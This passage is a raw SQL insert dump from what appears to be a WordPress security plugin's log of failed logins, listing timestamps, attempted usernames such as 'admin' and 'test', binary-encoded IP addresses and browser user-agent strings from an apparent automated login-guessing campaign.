rv:62.0) Gecko/20100101 Firefox/62.0'),(4629,7193,1629030628.018791,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��h���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4630,7195,1629030913.782092,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���#Jh','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4631,7196,1629031135.003064,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��^��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4632,7197,1629031343.132608,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��R@�x','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4633,7198,1629031580.319450,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��>��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4634,7200,1629032041.993057,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4635,7201,1629032243.276549,1,'loginFailInvalidUsername','user',0,'\0\0\0\0\0\0\0\0\0\0���\"%\'','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4636,7202,1629032534.879713,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��gvX','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4637,7203,1629032741.953692,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���ɬL','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4638,7205,1629032899.170528,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0����%','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4639,7206,1629033230.861577,1,'loginFailInvalidUsername','yilang',0,'\0\0\0\0\0\0\0\0\0\0���_l�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4640,7207,1629033423.012813,1,'loginFailInvalidUsername','junyong',0,'\0\0\0\0\0\0\0\0\0\0���aG�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4641,7208,1629033607.313221,1,'loginFailInvalidUsername','guest',0,'\0\0\0\0\0\0\0\0\0\0���n�u','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4642,7209,1629033926.671987,1,'loginFailInvalidUsername','xiaying',0,'\0\0\0\0\0\0\0\0\0\0��.�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4643,7210,1629034420.461530,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0����$�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4644,7211,1629034598.018672,1,'loginFailInvalidUsername','guorong',0,'\0\0\0\0\0\0\0\0\0\0��3��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4645,7212,1629034849.747465,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����E�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4646,7215,1629035245.520631,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���_l�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4647,7216,1629035554.817238,1,'loginFailInvalidUsername','wangchao',0,'\0\0\0\0\0\0\0\0\0\0��\"]�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4648,7217,1629035824.357320,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��ډ2','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4649,7218,1629036047.639776,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4650,7219,1629036300.826509,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��ʿ8A','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4651,7221,1629036934.375633,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4652,7222,1629037236.846240,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���ZE�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4653,7224,1629037690.065247,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���Z�C','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4654,7226,1629038115.372746,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���YY�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4655,7228,1629038601.761257,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���n�u','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4656,7228,1629038601.823671,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���n�u','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4657,7229,1629038941.302951,1,'loginFailInvalidUsername','wakgos',0,'\0\0\0\0\0\0\0\0\0\0��3[9�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4658,7230,1629039150.779142,1,'loginFailInvalidUsername','testuser',0,'\0\0\0\0\0\0\0\0\0\0���La','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4659,7231,1629039380.327981,1,'loginFailInvalidUsername','killo',0,'\0\0\0\0\0\0\0\0\0\0���ZE�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4660,7232,1629039861.810765,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���La','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4661,7234,1629040255.335855,1,'loginFailInvalidUsername','epper',0,'\0\0\0\0\0\0\0\0\0\0���AY','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4662,7235,1629040731.295710,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��.e�G','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4663,7236,1629041074.355458,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���aG�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4664,7237,1629041281.961214,1,'loginFailInvalidUsername','user',0,'\0\0\0\0\0\0\0\0\0\0��ˉsq','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4665,7238,1629041514.152200,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��3��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4666,7239,1629041668.815439,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��3�H�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4667,7240,1629041986.623018,1,'loginFailInvalidUsername','test1',0,'\0\0\0\0\0\0\0\0\0\0��g�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4668,7241,1629042223.509505,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��P���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4669,7242,1629042497.267997,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0����N�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4670,7243,1629042655.248342,1,'loginFailInvalidUsername','rtiop',0,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4671,7244,1629043208.127395,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��UX�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4672,7246,1629043644.434605,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4673,7247,1629043908.667184,1,'loginFailInvalidUsername','port',0,'\0\0\0\0\0\0\0\0\0\0���\'','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4674,7248,1629044126.207697,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0�����!','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4675,7249,1629044306.406806,1,'loginFailInvalidUsername','test',0,'\0\0\0\0\0\0\0\0\0\0���\"%\'','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4676,7250,1629044627.958219,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����k�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4677,7253,1629045364.988666,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0����;','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4678,7254,1629045868.242500,1,'loginFailInvalidUsername','wp_updates',0,'\0\0\0\0\0\0\0\0\0\0��%H','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4679,7255,1629046296.340270,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��MD ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4680,7256,1629046546.577121,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0�����m','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4681,7257,1629046805.869584,1,'loginFailInvalidUsername','preview',0,'\0\0\0\0\0\0\0\0\0\0��mꠙ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4682,7259,1629047279.908432,1,'loginFailInvalidUsername','test',0,'\0\0\0\0\0\0\0\0\0\0����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4683,7261,1629047773.021514,1,'loginFailInvalidUsername','demo',0,'\0\0\0\0\0\0\0\0\0\0��q�H�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4684,7262,1629048011.918187,1,'loginFailInvalidUsername','jsjobs_employer',0,'\0\0\0\0\0\0\0\0\0\0��3Q�$','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4685,7263,1629048262.866123,1,'loginFailInvalidUsername','jsjobs_jobseeker',0,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4686,7264,1629048487.597969,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��ʿ8A','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4687,7266,1629049169.576959,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4688,7267,1629049458.932158,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��]�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4689,7270,1629050166.685059,1,'loginFailInvalidUsername','marc',0,'\0\0\0\0\0\0\0\0\0\0���\n','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36'),(4690,7271,1629050178.323103,1,'loginFailInvalidUsername','test',0,'\0\0\0\0\0\0\0\0\0\0��ʿ8A','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4691,7272,1629050429.975403,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��}�L1','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4692,7273,1629050621.579860,1,'loginFailInvalidUsername','iranavada',0,'\0\0\0\0\0\0\0\0\0\0���H�.','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4693,7274,1629050853.244499,1,'loginFailInvalidUsername','test111',0,'\0\0\0\0\0\0\0\0\0\0��^��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4694,7276,1629051357.139257,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4695,7279,1629052102.517560,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���~P�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4696,7280,1629052472.248266,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���%�x','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4697,7281,1629052729.675381,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��R��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4698,7282,1629052820.644440,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��R�,�','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36'),(4699,7284,1629053301.296442,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���?�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4700,7285,1629054243.148899,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��g*o;','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4701,7286,1629054482.787220,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��.�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4702,7287,1629054725.304160,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0����t�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4703,7288,1629054955.667527,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��3Q�$','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4704,7289,1629055204.758660,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0����q�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4705,7290,1629055689.704340,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��`L�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4706,7292,1629055968.902122,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0����$�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4707,7293,1629056452.087417,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���A��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4708,7294,1629056698.322663,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��`L�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4709,7295,1629056964.983800,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���aG�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4710,7299,1629057914.743817,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��� �C','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4711,7300,1629058210.804953,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4712,7301,1629058357.922817,1,'loginFailInvalidUsername','orangganteng1',0,'\0\0\0\0\0\0\0\0\0\0��{��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4713,7302,1629058664.381588,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0����S�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4714,7303,1629059070.858505,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���Vҳ','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36'),(4715,7304,1629059193.474298,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���La','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4716,7305,1629059394.484313,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��#� ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4717,7307,1629059859.351783,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��-�c','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4718,7308,1629060051.823807,1,'loginFailInvalidUsername','editor',0,'\0\0\0\0\0\0\0\0\0\0���AY','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4719,7309,1629060391.982989,1,'loginFailInvalidUsername','root',0,'\0\0\0\0\0\0\0\0\0\0���ɬL','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4720,7310,1629060872.740616,1,'loginFailInvalidUsername','test',0,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4721,7311,1629061140.132408,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��]r��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4722,7312,1629061429.443964,1,'loginFailInvalidUsername','-',0,'\0\0\0\0\0\0\0\0\0\0��ʿ8A','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4723,7313,1629061872.469884,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��UX�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4724,7315,1629062366.426869,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���W�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4725,7316,1629062879.936198,1,'loginFailInvalidUsername','keir',0,'\0\0\0\0\0\0\0\0\0\0����T','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4726,7317,1629063120.314528,1,'loginFailInvalidUsername','mamah',0,'\0\0\0\0\0\0\0\0\0\0���,��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4727,7318,1629063385.837972,1,'loginFailInvalidUsername','test1',0,'\0\0\0\0\0\0\0\0\0\0��g�**','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4728,7319,1629063672.115089,1,'loginFailInvalidUsername','valentin',0,'\0\0\0\0\0\0\0\0\0\0��}�L1','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4729,7320,1629063851.682446,1,'loginFailInvalidUsername','one',0,'\0\0\0\0\0\0\0\0\0\0��� �C','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4730,7321,1629064143.414343,1,'loginFailInvalidUsername','prueba',0,'\0\0\0\0\0\0\0\0\0\0��}�L1','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4731,7322,1629064396.148853,1,'loginFailInvalidUsername','testtt',0,'\0\0\0\0\0\0\0\0\0\0��g\'7','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4732,7323,1629064633.808135,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��g\\�z','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4733,7325,1629065162.710770,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���aG�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4734,7326,1629065324.290820,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��ٮ�i','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36'),(4735,7327,1629065642.829282,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4736,7328,1629065895.044620,1,'loginFailInvalidUsername','test',0,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4737,7329,1629066037.595637,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4738,7330,1629066390.282218,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4739,7331,1629066936.778750,1,'loginFailInvalidUsername','dan',0,'\0\0\0\0\0\0\0\0\0\0����k�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4740,7332,1629067152.270247,1,'loginFailInvalidUsername','khayrollima@yahoo.com',0,'\0\0\0\0\0\0\0\0\0\0���;S�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4741,7333,1629067420.150730,1,'loginFailInvalidUsername','Jackson_Moore',0,'\0\0\0\0\0\0\0\0\0\0���_l�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4742,7334,1629067631.010500,1,'loginFailInvalidUsername','andre',0,'\0\0\0\0\0\0\0\0\0\0��\"I�w','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4743,7335,1629067895.100733,1,'loginFailInvalidUsername','username',0,'\0\0\0\0\0\0\0\0\0\0���?�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4744,7336,1629068107.861878,1,'loginFailInvalidUsername','wordpress',0,'\0\0\0\0\0\0\0\0\0\0���PK','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4745,7337,1629068383.893381,1,'loginFailInvalidUsername','test',0,'\0\0\0\0\0\0\0\0\0\0����2<','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4746,7339,1629068660.207911,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0����$�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4747,7340,1629068863.778293,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��-�c','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4748,7341,1629069431.461577,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��g�**','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4749,7342,1629069702.911456,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��-��#','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4750,7343,1629069916.730401,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��g|^,','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4751,7344,1629070193.743810,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��q�H�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4752,7345,1629070443.326717,1,'loginFailInvalidUsername','seller',0,'\0\0\0\0\0\0\0\0\0\0��)�H�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4753,7346,1629070653.326567,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��M�~�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4754,7347,1629071106.458181,1,'loginFailInvalidUsername','user2',0,'\0\0\0\0\0\0\0\0\0\0��h�g�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4755,7348,1629071420.580013,1,'loginFailInvalidUsername','maxas',0,'\0\0\0\0\0\0\0\0\0\0���ɬL','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4756,7350,1629071689.522749,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���ZE�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; 